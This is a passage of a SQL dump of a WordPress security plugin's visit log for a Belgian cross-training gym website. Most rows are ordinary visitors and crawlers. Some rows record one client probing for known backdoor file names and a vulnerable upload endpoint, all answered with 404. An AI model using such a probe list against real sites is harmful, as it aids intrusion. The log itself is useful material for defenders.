(70449, 1492883214.040040, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70450, 1492883214.469453, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70451, 1492883214.898370, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70452, 1492883215.362046, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70453, 1492883215.843850, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70454, 1492883216.369625, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70455, 1492883216.797781, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70456, 1492883217.221210, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70457, 1492883217.749990, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70458, 1492889554.127559, 1123632454, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70459, 1492893990.088527, 1796538632, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(70460, 1492893990.671884, 1796538632, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(70461, 1492893991.653114, 676177851, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70462, 1492898260.580350, 2366158866, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70463, 1492899229.279639, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70464, 1492899232.443174, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70465, 1492901510.826930, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/formcraft/file-upload/server/php/', 'http://www.crosstrainingcenter.be/wp-content/plugins/formcraft/file-upload/server/php/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(70466, 1492902193.659948, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(70467, 1492902884.749288, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(70468, 1492906448.734638, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70469, 1492935736.383970, 1439284665, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(70470, 1492935738.464450, 1439284665, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(70471, 1492935761.601810, 1439284665, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(70472, 1492935777.740481, 1439284665, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(70473, 1492935789.426213, 1439284665, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),
(70474, 1492937232.112729, 676177833, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70475, 1492937232.132593, 676177833, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70476, 1492938821.173965, 1834499396, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwi5jNX1nbrTAhWKZVAKHRfGAkwQFgg0MAM&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(70477, 1492938822.313219, 1834499396, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(70478, 1492943263.112620, 1123631313, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70479, 1492943263.656101, 1123631313, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70480, 1492943950.288821, 2655379749, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70481, 1492943955.049853, 2655379749, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70482, 1492943955.524345, 2655379749, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70483, 1492943956.025757, 2655379749, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70484, 1492943957.075091, 2655379749, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70485, 1492943958.296262, 2655379749, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70486, 1492943959.289847, 2655379749, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70487, 1492943960.316243, 2655379749, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70488, 1492943962.716328, 2655379749, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70489, 1492943963.716861, 2655379749, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70490, 1492943964.863189, 2655379749, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Dataprovider.com;)'),
(70491, 1492943965.901817, 2655379749, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-G925F Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.94 Mobile Safari/537.36'),
(70492, 1492956211.928156, 1567842252, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://pizza-imperia.com/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36'),
(70493, 1492956920.792858, 1123631176, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70494, 1492956921.819900, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70495, 1492956922.340239, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70496, 1492957072.348273, 2637637575, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)'),
(70497, 1492959651.095035, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70498, 1492962356.855117, 676177685, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70499, 1492963892.363656, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70500, 1492965778.604399, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70501, 1492965779.198906, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70502, 1492965779.689062, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70503, 1492965780.187921, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70504, 1492965780.775904, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70505, 1492965781.407377, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70506, 1492965782.177357, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70507, 1492965782.703954, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70508, 1492965783.215209, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70509, 1492965783.727033, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70510, 1492965784.239025, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70511, 1492966000.791161, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70512, 1492967609.663173, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/css/logo_img.php', 'http://crosstrainingcenter.be/wp-admin/css/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70513, 1492967609.685794, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/css/maink.php', 'http://crosstrainingcenter.be/wp-admin/css/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70514, 1492967645.426490, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/logo_img.php', 'http://crosstrainingcenter.be/wp-admin/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70515, 1492967645.605073, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/logsa.php', 'http://crosstrainingcenter.be/wp-content/plugins/logsa.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70516, 1492967645.611949, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/images/maink.php', 'http://crosstrainingcenter.be/wp-admin/images/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70517, 1492967645.646236, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/maink.php', 'http://crosstrainingcenter.be/wp-admin/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70518, 1492967645.800911, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/includes/maink.php', 'http://crosstrainingcenter.be/wp-admin/includes/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70519, 1492967645.824502, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/logo_img.php', 'http://crosstrainingcenter.be/wp-content/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70520, 1492967645.867807, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/includes/logo_img.php', 'http://crosstrainingcenter.be/wp-admin/includes/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70521, 1492967646.026890, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/logo_img.php', 'http://crosstrainingcenter.be/wp-content/themes/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70522, 1492967646.043442, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/logo_img.php', 'http://crosstrainingcenter.be/wp-content/plugins/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70523, 1492967646.073576, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-backup-made/system.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-backup-made/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70524, 1492967646.076421, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/maink.php', 'http://crosstrainingcenter.be/wp-content/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70525, 1492967646.080059, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/network/logo_img.php', 'http://crosstrainingcenter.be/wp-admin/network/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70526, 1492967646.142154, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/js/logo_img.php', 'http://crosstrainingcenter.be/wp-admin/js/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70527, 1492967646.143062, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/js/maink.php', 'http://crosstrainingcenter.be/wp-admin/js/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70528, 1492967646.235927, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/user/logo_img.php', 'http://crosstrainingcenter.be/wp-admin/user/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70529, 1492967683.951694, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/logo_img.php', 'http://crosstrainingcenter.be/wp-content/uploads/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70530, 1492967683.988410, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/phpini.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/phpini.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70531, 1492967684.004547, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/maink.php', 'http://crosstrainingcenter.be/wp-includes/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70532, 1492967684.135214, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/zenite/apache-conf.php', 'http://crosstrainingcenter.be/wp-content/themes/zenite/apache-conf.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70533, 1492967684.135971, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/css/logo_img.php', 'http://crosstrainingcenter.be/wp-includes/css/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70534, 1492967684.201655, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/upgrade/logo_img.php', 'http://crosstrainingcenter.be/wp-content/upgrade/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70535, 1492967684.275906, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/images/logo_img.php', 'http://crosstrainingcenter.be/wp-includes/images/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70536, 1492967684.316397, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/wp-ajax.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/wp-ajax.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70537, 1492967684.330717, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/logo_img.php', 'http://crosstrainingcenter.be/wp-includes/js/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70538, 1492967684.331516, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/info.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/info.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70539, 1492967684.344674, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/system_ml.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/system_ml.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70540, 1492967684.348694, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/images/maink.php', 'http://crosstrainingcenter.be/wp-includes/images/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70541, 1492967684.382738, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/404.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/404.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(70542, 1492967684.385182, 1568498494, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/nginx2.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/nginx2.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(70543, 1492971255.079036, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70544, 1492971255.747194, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70545, 1492971256.369796, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70546, 1492971256.906486, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70547, 1492971257.511472, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70548, 1492971258.040249, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70549, 1492971258.731624, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70550, 1492971259.333151, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70551, 1492971259.859730, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70552, 1492971260.378427, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70553, 1492971260.862361, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70554, 1492973030.081418, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70555, 1492973705.450064, 2071807790, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(70556, 1492973705.523686, 2071806885, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36'),
(70557, 1492974492.716741, 1605828477, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) GSA/24.1.151204851 Mobile/13G36 Safari/601.1'),
(70558, 1492974603.237036, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(70559, 1492974604.934857, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70560, 1492974607.694553, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
